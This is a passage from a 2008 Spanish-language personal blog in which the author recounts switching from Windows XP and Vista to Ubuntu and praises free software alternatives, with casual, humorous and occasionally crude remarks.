pongannos asi sea en vitrina para que los de 3000 nos vean y sientran la verdadera revolucion tecnologica...
Bueno me extendi un poco, pero creo que el tema lo vale, no todo es en vano, espero que los patrocinadores y organizadores vean esto y por lo menos contraten a la monita de Terra...lol



"No importa cuál sea el resultado previsto. Siempre habrá alguien impaciente por: malinterpretarlo; imitarlo, o creer que ha sido a causa de su teoría favorita" (Kant Rain All Time)

sábado, 11 de octubre de 2008

El paso final y definitivo a Ubuntu...


Como algunos saben, fui uno de esos fanaticos que se armo una plataforma spider apenas llegaron al mercado con uno de los conocidisimos AMD Phenom 9600Black (conocidisimos por un bug con el que salieron a venta), y despues de eso, he probado infinidad de sistemas Operativos, empezando por los basicos Windows XP y Vista, el primero lo abandone casi que inmediatamente puesto que ni siquiera reconocia mi memoria RAM (4Gb) ademas de que se subutilizaba la maquina, teniendo que hacer todo un procedimiento para que funcionara bien, (vean el articulo tutorial de optimizacion Dual-Core); luego estuve un rato con Vista (aburrido como la mayoria) y mis 64 bits me servian pa un carajo, igual el equipo se veia muy bacano, pero en realidad el SO era (perdonen la expresion) una verdadera mierda; hasta que salio el Service Pack1 para Vista, prueba de que sacaron el sistema a las carreras y ahora si andaba (no corria) bien, pero seguia insatisfecho con muchas cosas, en juegos, no me podia quejar, estaba de lujo, pero en cuanto a trabajo real se referia era una mamera (esta seguro de que desea ejecutar este programa) y cosas como esta me tenian un poco fatigado, migre entonces a Vista x64 Service Pack 1, para ver si tenia un mejor desempeño, cosa que si era asi no era muy notoria, y en cambio si era un camello conseguir drivers/programas; por este motivo decidi ir mas alla y descargue Ubuntu una de las distribuciones GNU/Linux mas utilizadas en este momento (ahora entiendo el porque)en su version para 64Bits; Resultado, despues de 30 minutos de instalacion, (por cierto en esto si se parecen a windows), tuve un sistema operativo completo en 64Bits y con la mayoria de programas que necesitaba, el resto fue poner marcha algunas cosas; para instalar mi ATI fue cuestion de escribir en la consola sudo apt-get install envyng; y este programilla me ajusto por arte de magia los drivers de video, los drivers de mi tarjeta Wi-fi no solo los reconocio automaticamente, si no que me dio mas alcance, y mas funcionalidades, como el modo monitor, y el modo injection, que permitian hacer auditoria a redes Wireless para cuestiones de seguridad y eso, luego fue cuestion de buscar los clones de programas comunes que usaba en Winblows, por ejemplo la alternativa gratuita Gimp que me reemplazo a la perfeccion a photoshop, pudiendo incluso abrir imagenes en PSD, ó OpenOffice la alternativa a Office que no voy a negar que me costo un poco empezar a utilizar y opte por instalar con la ayuda de Wine un Office 2003, pero al final me decidi por la alternativa libre, no queria deberle favores a Mocosoft ademas de demostrarme a mi mismo de que podia trabajar con el sistema libremente, luego para que quedara bien llamativo, instale todo el paquete de CompizFusion, logro que mas personas voltearan a mirar mi escritorio.
En fin el cambio ha sido para mejorar al 100% tanto asi que ya tengo instalado ubuntu entodos mis equipos, en la casa, en la oficina, y hasta a las niñas les instale en su equipo Ubuntu, ya lo manejan a la perfeccion y eso que solo tienen 5 y 9 Años respectivamente, la idea se divulga, la mayor ya le dice a sus amigas, ustedes todavia con windows, no, yo tengo uno mejor que eso, y la pequeñita disfrutando herramientas como Gcompris y Tuxpaint, que hacen que ya se peleen por el computador, en fin ya hace mas de 10 meses que estoy trabajando enteramente con GNU/Linux, ya he instalado 2 servidores con Ubuntu Server, y hasta ahora cero problemas, tambien he vendido equipos armados con Ubuntu como sistema principal para Empresas, y hasta ahora todo bien, lo unico es que ahora me llaman menos, pues sus PC's no fallan tanto, en ese caso si me quedo con Winblows, pues me da de comer... jajaja... mentiras ya mas adelante les contare pero ya me idee la forma de poder seguir comiendo gracias al Software Libre...
Seguire comentandoles acerca de mi experiencia, un Post mas abajo coloque las Distribuciones GNU/Linux que poseo para enviarselas al que necesite sin ningun costo, mas adelante colocare tutoriales tambien para GNU/Linux y no solo como hasta ahora de Wintendo...
"Si existe la posibilidad de que varias cosas vayan mal, la que cause más perjuicios será la única que vaya mal" (Kant Rain All Time)